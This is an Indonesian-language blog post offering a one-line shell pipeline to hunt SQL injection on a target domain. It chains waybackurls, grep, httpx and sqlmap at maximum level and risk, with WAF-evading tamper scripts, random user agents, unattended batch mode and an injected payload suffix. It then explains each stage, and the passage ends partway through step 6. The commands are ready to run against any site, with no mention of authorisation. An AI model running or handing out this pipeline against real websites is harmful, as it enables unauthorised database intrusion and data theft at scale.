Wednesday, 13 November 2024

Cara mudah mencari kerentanan sql injection

Berikut adalah cara paling mudah untuk mencari kerentanan sql injection pada sebuah website hanya dengan 1 perintah.



1 Baris perintah untuk mencari kerentanan SQLI :


waybackurls target.com | grep '=' | httpx --silent --status-code | awk '{print $1}' | xargs -I{} sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'


atau


waybackurls target.com | grep '=' | httpx --silent --status-code | awk '{print $1}' | xargs -I{} sqlmap -u {} --random-agent --tamper=space2comment --level 5 --risk 3 --batch --threads 5



1. waybackurls target.com


Deskripsi: Alat waybackurls digunakan untuk mengambil arsip URL dari Wayback Machine atau penyimpanan arsip lainnya untuk domain target.com.

    

Fungsi: Ini memberikan daftar URL yang sebelumnya diketahui untuk domain tersebut, yang bisa mencakup titik masuk potensial bagi serangan.


2. grep '='


Deskripsi: grep '=' digunakan untuk memfilter URL yang mengandung tanda =.

   

Fungsi: URL yang mengandung = biasanya menunjukkan adanya parameter dalam URL, yang mungkin rentan terhadap serangan SQL Injection atau eksploitasi parameter lainnya.


3. httpx --silent --status-code


Deskripsi: httpx adalah alat yang mengirimkan permintaan HTTP ke URL yang difilter dari output waybackurls dan menambahkan status code HTTP pada setiap baris URL hasilnya.

    

Fungsi: Ini memeriksa apakah URL masih aktif (contohnya, hanya mengambil URL yang memiliki kode status valid seperti 200).


4. awk '{print $1}'


Deskripsi: awk digunakan untuk menampilkan hanya URL, tanpa status code.

    

Fungsi: Karena httpx menambahkan status code pada output, awk '{print $1}' memisahkan URL tersebut agar mudah digunakan dalam tahap selanjutnya.


5. xargs -I{} sqlmap -u {} ...


Deskripsi: xargs menjalankan perintah sqlmap untuk setiap URL yang difilter, menggantikan {} dengan URL dari hasil awk.

    

Fungsi: xargs memungkinkan penggunaan dinamis dari URL sebagai input untuk sqlmap.


6. sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'